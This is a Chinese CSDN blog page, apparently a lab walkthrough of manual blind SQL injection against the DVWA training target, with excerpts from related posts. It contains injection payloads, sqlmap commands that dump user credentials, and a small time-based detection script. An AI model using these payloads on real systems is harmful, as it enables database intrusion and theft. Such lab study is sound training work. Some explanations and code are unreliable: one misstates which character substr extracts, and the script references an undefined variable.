【DVWA】21. SQL Injection (Blind)SQL注入盲注(Low手工版)

最新推荐文章于 2025-05-12 16:08:19 发布
最新推荐文章于 2025-05-12 16:08:19 发布
阅读量1.4k 收藏 17
点赞数 24
CC 4.0 BY-SA版权
分类专栏: # DVWA 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43965597/article/details/137510057

文章目录

1. Low

1.1 判断注入类型

首先判断是什么类型的注入
输入

1and1='1

查询成功,说明为字符型注入
在这里插入图片描述

1.2 判断数据库名

然后进行数据库名猜解
首先是长度的猜解

1' and length(database())=1#

在这里插入图片描述
说明长度不为1

在这里插入图片描述猜解结果为长度为4

然后猜解库名,采用二分法,一个一个字符猜解

d:

1' and ascii(substr(database(),1,1))=100#

在这里插入图片描述ascii(substr(database(),1,1)):这部分是一个SQL查询。让我们逐步解释它:
database():这是一个MySQL内置函数,用于获取当前数据库的名称。
substr():这是截取字符串的函数。在这里,它用于从数据库名称中提取第二个字符。
ascii():这是将字符转换为ASCII码的函数。因此,ascii(substr(database(),1,1))返回数据库名称的第二个字符的ASCII码。
=100:这是一个比较操作,检查第二个字符的ASCII码是否等于100
1 和 1 是用于指定截取字符串的起始位置和长度的参数
v:

1' and ascii(substr(database(),2,1))=
最低0.47元/天 解锁文章
dvwa----sqllow
qq_45487671的博客
05-28 1273
实验4 SQL 1.实验目的 (1)理解SQL(布尔、时间、报错)的原理; (2)学习手工的过程; (3)了解SQL注入的防御技术。 2.实验要求 登陆DVWA平台,结合所学SQL的基本知识,爆出当前使用的数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。关键位置截图。 3.实验过程描述 服务器端源代码 low级别,查看源代码,文本框提交为get请求方式,为佳任何输入过滤限制 同时SQL语句查询返回的结果只有两种, `User ID exists in
DVWA靶场SQL注入low
qq_61975388的博客
08-17 738
DVWA靶场SQL注入实战
DVWA靶场保姆级通关教程--08SQL(上)
最新发布
m0_74020575的博客
05-12 1258
SQL是一种特殊的SQL注入攻击,攻击者通过构造恶意SQL语句操控后台数据库,但无法直接获取错误信息或查询结果,只能通过观察应用程序响应的细微差异(如页面跳转、响应时间等)来推断数据库信息。
DVWA SQL注入low)
fqefeq的博客
03-08 2072
若输入1’and ‘1’ =’1(或1’and 1 =1#),正常返回;输入1’ and’1’=’2(或1’and 1=2#),不正常返回,则证明其为字符型注入(一般用#方法)若输入1 and 1 =1,正常返回;输入1 and 1=2,不正常返回,则证明其为数字型注入(题中输入1 and 1=2,正常返回,不是数字型注入)后台语句:select Firstname,Surname from users where id='1' union select 1,2#'1.判断注入点是否存在注入
DVWAsql注入low
m0_52923241的博客
03-12 614
SQL injection 先尝试输入1,可以得到正常的回显 尝试输入User ID:1’判断是否存在注入 可以判断出sql 遍历数据库
DVWA sql注入-LOW
m0_46616663的博客
05-23 681
1.判断是否存在sql注入漏洞 出现报错,说明存在sql注入漏洞,无论是字符型还是整形都会因为单引号个数不匹配而报错。 如果未报错则未必存在sql注入,有可能存在对输入内容的过滤,采用其他方法判断是否存在注入。 2.判断注入漏洞的类型 分为两种: 数字型和字符型。 这是数据库本身存储数据时赋予给数据的类型。 先判断是否为数字型: 输入1 and 1 = 1 页面运行正常 输入1 and 1 = 2 页面也运行正常 分析: 如果查询语句为数字型的话...
DVWAsql注入漏洞-low
m0_63735735的博客
07-19 1826
DVWAsql注入漏洞-low
DVWA】20. SQL Injection (Blind)SQL注入(全等级Sqlmap
Zichel77的博客
04-08 2563
,有两种主要类型,包括布尔和时间
DVWA靶场-SQL Injection (Blind)SQL注入
mlws1900的博客
03-19 1749
直接使用报错:' union select 1,count(*),concat('/',(select @@datadir),'/',floor(rand(0)*2))a from information_schema.columns group by a--+,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此的难度要比一般注入高。length:正整数,指定将从左边返回的字符数。
布尔/DVWA/sql Injection (Blind)/low
m0_59947521的博客
01-22 2201
区别布尔时间布尔时间布尔时间
DVWA——SQL注入+
qq_58553228的博客
06-02 2309
目的:执行特定sql语句,获得其他相关内容。攻击方式:动态构造SQL语句影响:数据库的脱裤、修改、甚至影响到操作系统。
Dvwa练习06 SQL注入Low
coco3105的博客
02-19 1255
等级low分别用了手工sqlmap注入,medium没实践,high采用的是旧本,没过滤参数。
DVWA sql注入low级别
LRainner的博客
09-18 1069
DVWA sql注入low级别 sql注入分类 数字型注入 SELECT first_name, last_name FROM users WHERE user_id = $id 字符型注入 SELECT first_name, last_name FROM users WHERE user_id = ‘$id’ 一般可以通过直接输入单引号来判断是否存在注入点 通过输入3和1+2判断注入为字符型注入,若为数字型注入,则3和1+2输出一样 字符型注入 字符型注入最关键的是如何闭合SQ
DVWA sql注入low
gclome的博客
07-05 722
如何判断sql注入是字符型还是数字型: https://www.cnblogs.com/aq-ry/p/9368619.html 下面开始进行注入 刚进入是这样的: 1.输入 ?id=1'%23 输入?id=1' and 1=1 %23 输入?id=1' and 1=2 %23 成功执行,且可以判断出为字符型注入 2.接下来判断字段数 插入代码?id=1' order by 4%23 可见字...
DVWA靶场全关卡---SQL注入low
weixin_63294541的博客
03-17 729
目录1、找注入点2、猜字段3、回显显示4、找数据库5、获取数据库中的表6、查看表中的字段7、显示字段的值8、我们就拿到了用户名和密码了! 方法顺序如下: 1' and 1=1 order by 1# 从头开始试,到几报错就是有几个字段减一。 所以,有两个字段。1'union select 1,2# (1'是闭合,union连接,select 1,2是占位) 1'union select 1,database()# -----找到数据库名称为Surname: dvwa 1' unio
DVWASQL注入LOW
weixin_46831054的博客
02-17 3307
SQL注入流程 面对一个查询条件的web网页,我们需要做以下的事情 1.判断是否存在注入注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定显示的字段顺序 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.下载数据 这里我们用hackbar,方便我们操作。 http://192.168.5.155:85/vulnerabilities/sqli/?id=1&Submit=Submit# 利用hackbar后我们在加黑处进行命令修改,以达到手工注入的目的 1.判断是否
DVWA------sql注入low)(字符型)
qwsn
11-01 1976
================================================================================== 0x01:上low源码 ================================================================================== 0x02:sql注入low) 一...
sql注入dvwalow
****的博客
09-02 297
靶机:dvwa bug:SQL Injection 难度等级:low ** 分析 ** 在输入框中分别输入“1”、“1’ and 1=1#”,“1’ and 1=1#”三条命令。发现第一条和第二条能执行成功,第三条不能执行成功,这说明这个地方存在注入点。(直接上sqlmap试试) sqlmap爆破 利用burpsuite抓取数据包,获取requests的header,存入txt文本中。 ...
DVWA--SQL注入(SQL Injection)--Low
JakeLin's Blog
06-15 486
SQL注入常规思路: 1、寻找注入点,可以通过 web 扫描工具实现 2、通过注入点,尝试获得关于连接数据库用户名、数据库名称、连接数据库用户权限、操作系统信息、数据库本等相关信息。 3、猜解关键数据库表及其重要字段与内容(常见如存放管理员账户的表名、字段名等信息) 4、可以通过获得的用户信息,寻找后台登录。 5、利用后台或了解的进一步信息,上传 webshell 或向数据库写入一句话木马,以进一步提权,直到拿到服务器权限。 手工注入常规思路: 1.判断是否存在注入注入是字符型还是...
sql注入dvwa
03-30
### 关于 DVWASQL 注入技术及其测试 SQL 是一种高级的 SQL 注入攻击形式,在这种情况下,应用程序不会返回任何错误消息或查询结果给攻击者。相反,攻击者通过发送特定请求并观察响应时间或其他间接信号来推断数据库的内容[^1]。 #### 如何利用 DVWA 测试 SQL DVWA 提供了一个低安全级别的环境用于练习 SQL 注入技术。为了测试 SQL ,可以按照以下方式操作: 1. **设置目标 URL 和 Cookie** 需要指定目标 URL 并提供必要的会话 cookie 来保持登录状态。例如: ```bash python sqlmap.py --url="http://192.168.152.129/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" \ --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" ``` 这里 `sqli_blind` 是专门针对模块的路径[^3]。 2. **检测是否存在漏洞** 使用工具如 sqlmap 可以自动探测是否有的可能性。如果发现存在,则可以通过布尔型或基于时间延迟的方式进一步挖掘数据。 布尔型依赖于条件判断的结果改变页面行为;而基于时间延迟的则通过测量服务器响应的时间差异来进行推测[^4]。 3. **提取表结构和其他敏感信息** 当确认有漏洞后,可尝试获取更多关于数据库的信息,比如列出所有的表格名称或者字段名等。例如命令如下所示: ```bash python sqlmap.py ... -D dvwa --tables ``` 此外还可以继续深入探索具体某个表内的记录详情: ```bash python sqlmap.py ... -T users -C username,password --dump ``` 以上过程展示了如何借助自动化脚本以及手动分析相结合的方式来研究和实践 SQL 的技术要点[^2]。 ```python import requests def check_sql_injection(url, payload): params = {'id': payload} cookies = {"PHPSESSID": "your_session_id", "security":"low"} r = requests.get(url,params=params,cookies=cookies) if "True" in r.text or len(r.content) != normal_response_length: return True return False normal_response_length=len(requests.get(base_url).content) payload='1 AND SLEEP(5)-- ' if(check_sql_injection(base_url,payload)): print('Time-based Blind Injection Detected') else: print('No Vulnerability Found.') ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值